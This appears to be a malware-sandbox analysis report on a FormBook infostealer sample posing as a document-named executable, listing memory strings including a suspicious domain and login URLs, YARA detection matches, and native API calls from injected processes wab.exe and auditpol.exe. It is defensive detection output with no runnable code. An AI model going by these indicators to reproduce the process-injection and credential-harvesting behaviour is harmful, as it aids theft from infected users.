Source: uIklAoJgpkP.exe, 0000000B.00000002.4131269057.0000000004AE2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x100.shop/uaxy/
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: auditpol.exe, 0000000A.00000003.2190222583.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0042C783 NtClose,	1_2_0042C783
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB35C0 NtCreateMutant,LdrInitializeThunk,	1_2_02EB35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2B60 NtClose,LdrInitializeThunk,	1_2_02EB2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_02EB2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_02EB2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB4340 NtSetContextThread,	1_2_02EB4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3090 NtSetValueKey,	1_2_02EB3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3010 NtOpenDirectoryObject,	1_2_02EB3010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB4650 NtSuspendThread,	1_2_02EB4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AF0 NtWriteFile,	1_2_02EB2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AD0 NtReadFile,	1_2_02EB2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AB0 NtWaitForSingleObject,	1_2_02EB2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BE0 NtQueryValueKey,	1_2_02EB2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BF0 NtAllocateVirtualMemory,	1_2_02EB2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BA0 NtEnumerateValueKey,	1_2_02EB2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2B80 NtQueryInformationFile,	1_2_02EB2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB39B0 NtGetContextThread,	1_2_02EB39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2EE0 NtQueueApcThread,	1_2_02EB2EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2EA0 NtAdjustPrivilegesToken,	1_2_02EB2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2E80 NtReadVirtualMemory,	1_2_02EB2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2E30 NtWriteVirtualMemory,	1_2_02EB2E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FE0 NtCreateFile,	1_2_02EB2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FA0 NtQuerySection,	1_2_02EB2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FB0 NtResumeThread,	1_2_02EB2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F90 NtProtectVirtualMemory,	1_2_02EB2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F60 NtCreateProcessEx,	1_2_02EB2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F30 NtCreateSection,	1_2_02EB2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CF0 NtOpenProcess,	1_2_02EB2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CC0 NtQueryVirtualMemory,	1_2_02EB2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CA0 NtQueryInformationToken,	1_2_02EB2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C60 NtCreateKey,	1_2_02EB2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C00 NtQueryInformationProcess,	1_2_02EB2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DD0 NtDelayExecution,	1_2_02EB2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DB0 NtEnumerateKey,	1_2_02EB2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3D70 NtOpenThread,	1_2_02EB3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D30 NtUnmapViewOfSection,	1_2_02EB2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D00 NtSetInformationFile,	1_2_02EB2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D10 NtMapViewOfSection,	1_2_02EB2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3D10 NtOpenProcessToken,	1_2_02EB3D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03694340 NtSetContextThread,LdrInitializeThunk,	10_2_03694340
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03694650 NtSuspendThread,LdrInitializeThunk,	10_2_03694650
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036935C0 NtCreateMutant,LdrInitializeThunk,	10_2_036935C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692B60 NtClose,LdrInitializeThunk,	10_2_03692B60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_03692BE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_03692BF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_03692BA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AF0 NtWriteFile,LdrInitializeThunk,	10_2_03692AF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AD0 NtReadFile,LdrInitializeThunk,	10_2_03692AD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036939B0 NtGetContextThread,LdrInitializeThunk,	10_2_036939B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F30 NtCreateSection,LdrInitializeThunk,	10_2_03692F30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FE0 NtCreateFile,LdrInitializeThunk,	10_2_03692FE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FB0 NtResumeThread,LdrInitializeThunk,	10_2_03692FB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_03692EE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_03692E80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_03692D30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_03692D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03692DF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DD0 NtDelayExecution,LdrInitializeThunk,	10_2_03692DD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C60 NtCreateKey,LdrInitializeThunk,	10_2_03692C60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03692C70
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_03692CA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693010 NtOpenDirectoryObject,	10_2_03693010
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693090 NtSetValueKey,	10_2_03693090
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692B80 NtQueryInformationFile,	10_2_03692B80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AB0 NtWaitForSingleObject,	10_2_03692AB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F60 NtCreateProcessEx,	10_2_03692F60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FA0 NtQuerySection,	10_2_03692FA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F90 NtProtectVirtualMemory,	10_2_03692F90
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692E30 NtWriteVirtualMemory,	10_2_03692E30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692EA0 NtAdjustPrivilegesToken,	10_2_03692EA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693D70 NtOpenThread,	10_2_03693D70
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D00 NtSetInformationFile,	10_2_03692D00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693D10 NtOpenProcessToken,	10_2_03693D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DB0 NtEnumerateKey,	10_2_03692DB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C00 NtQueryInformationProcess,	10_2_03692C00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CF0 NtOpenProcess,	10_2_03692CF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CC0 NtQueryVirtualMemory,	10_2_03692CC0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C9250 NtAllocateVirtualMemory,	10_2_029C9250
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C90E0 NtClose,	10_2_029C90E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C9030 NtDeleteFile,	10_2_029C9030
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C8F40 NtReadFile,	10_2_029C8F40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C8DD0 NtCreateFile,	10_2_029C8DD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F9F3 NtSetContextThread,NtResumeThread,	10_2_0347F9F3

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8833D0	0_2_00007FFD9B8833D0
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88BF11	0_2_00007FFD9B88BF11
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88BA89	0_2_00007FFD9B88BA89
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88B2D3	0_2_00007FFD9B88B2D3
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8845F0	0_2_00007FFD9B8845F0
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88E895	0_2_00007FFD9B88E895
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B950068	0_2_00007FFD9B950068
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00418703	1_2_00418703
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004168CE	1_2_004168CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004168D3	1_2_004168D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040E17D	1_2_0040E17D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00410103	1_2_00410103
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040E183	1_2_0040E183
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402AC0	1_2_00402AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00403420	1_2_00403420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0042EDF3	1_2_0042EDF3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040FEE3	1_2_0040FEE3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402790	1_2_00402790
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D2F0	1_2_02E9D2F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED	1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0	1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0	1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274	1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F403E6	1_2_02F403E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0	1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A	1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3A352	1_2_02F3A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C	1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D	1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F0E0	1_2_02F3F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F370E9	1_2_02F370E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0	1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F0CC	1_2_02F2F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F381CC	1_2_02F381CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8B1B0	1_2_02E8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F401AA	1_2_02F401AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB516C	1_2_02EB516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B16B	1_2_02F4B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70100	1_2_02E70100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118	1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9C6E0	1_2_02E9C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC	1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7C7C0	1_2_02E7C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F7B0	1_2_02F3F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA4750	1_2_02EA4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2E4F6	1_2_02F2E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71460	1_2_02E71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F32446	1_2_02F32446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F43F	1_2_02F3F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1D5B0	1_2_02F1D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F40591	1_2_02F40591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37571	1_2_02F37571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80535	1_2_02E80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2DAC6	1_2_02F2DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC5AA0	1_2_02EC5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1DAAC	1_2_02F1DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7EA80	1_2_02E7EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF3A6C	1_2_02EF3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37A46	1_2_02F37A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FA49	1_2_02F3FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EBDBF9	1_2_02EBDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F36BD7	1_2_02F36BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9FB80	1_2_02E9FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FB76	1_2_02F3FB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3AB40	1_2_02F3AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E838E0	1_2_02E838E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE8F0	1_2_02EAE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E668B8	1_2_02E668B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E82840	1_2_02E82840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8A840	1_2_02E8A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E829A0	1_2_02E829A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4A9A6	1_2_02F4A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E96962	1_2_02E96962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E89950	1_2_02E89950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B950	1_2_02E9B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3EEDB	1_2_02F3EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E89EB0	1_2_02E89EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3CE93	1_2_02F3CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E92E90	1_2_02E92E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80E59	1_2_02E80E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3EE26	1_2_02F3EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E72FC8	1_2_02E72FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FFB1	1_2_02F3FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81F92	1_2_02E81F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF4F40	1_2_02EF4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC2F28	1_2_02EC2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0F30	1_2_02EA0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FF09	1_2_02F3FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FCF2	1_2_02F3FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70CF2	1_2_02E70CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20CB5	1_2_02F20CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF9C32	1_2_02EF9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80C00	1_2_02E80C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7ADE0	1_2_02E7ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9FDC0	1_2_02E9FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E98DBF	1_2_02E98DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37D73	1_2_02F37D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83D40	1_2_02E83D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F31D5A	1_2_02F31D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8AD00	1_2_02E8AD00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371A352	10_2_0371A352
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0364D34C	10_2_0364D34C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371132D	10_2_0371132D
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037203E6	10_2_037203E6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366E3F0	10_2_0366E3F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A739A	10_2_036A739A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03700274	10_2_03700274
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367D2F0	10_2_0367D2F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037012ED	10_2_037012ED
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367B2C0	10_2_0367B2C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036652A0	10_2_036652A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0369516C	10_2_0369516C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0364F172	10_2_0364F172
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0372B16B	10_2_0372B16B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036E8158	10_2_036E8158
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03650100	10_2_03650100
